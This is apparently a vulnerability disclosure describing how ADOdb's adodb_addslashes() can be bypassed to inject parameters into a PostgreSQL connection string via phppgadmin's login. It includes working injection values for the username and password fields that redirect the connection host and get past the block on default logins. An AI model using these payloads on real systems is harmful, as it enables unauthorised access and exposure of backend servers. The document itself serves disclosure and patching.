Description

An attacker can inject values into the PostgreSQL connection string by bypassing adodb_addslashes() .
The function can be bypassed in phppgadmin for example by surrounding the username in quotes and submitting with other parameters injected in between.

Proof of Concept

I’m going to use phppgadmin as an example of a project that this effects.

When a user goes to login the username and password are passed to this function before reaching pg_connect()

function adodb_addslashes($s)
{
	$len = strlen($s);
	if ($len == 0) return "''";
	if (strncmp($s,"'",1) === 0 && substr($s,$len-1) == "'") return $s; // already quoted

	return "'".addslashes($s)."'";
}

An attacker can login with a username of: 'testinguser' host='1.3.3.7' and the phppgadmin will login but be connected to 1.3.3.7 .

Impact

In the context of phppgadmin getting past the login panel opens up a lot more possibilities for functions to exploit.
It can also reveal the backend IP of a server. I was unable to find anything other than the host parameter to inject into the connection string that was interesting.

This bypass also allows an attacker to use default logins that would otherwise be blocked in phppgadmin (the password part here could by bypassed by using '' lol='' as a password)

$bad_usernames = array('pgsql', 'postgres', 'root', 'administrator');
$username = strtolower($server_info['username']);  
  
if ($server_info['password'] == '' || in_array($username, $bad_usernames)) {  
   unset($_SESSION['webdbLogin'][$_REQUEST['server']]);  
   $msg = $lang['strlogindisallowed'];  
   include('./login.php');  
   exit;  
}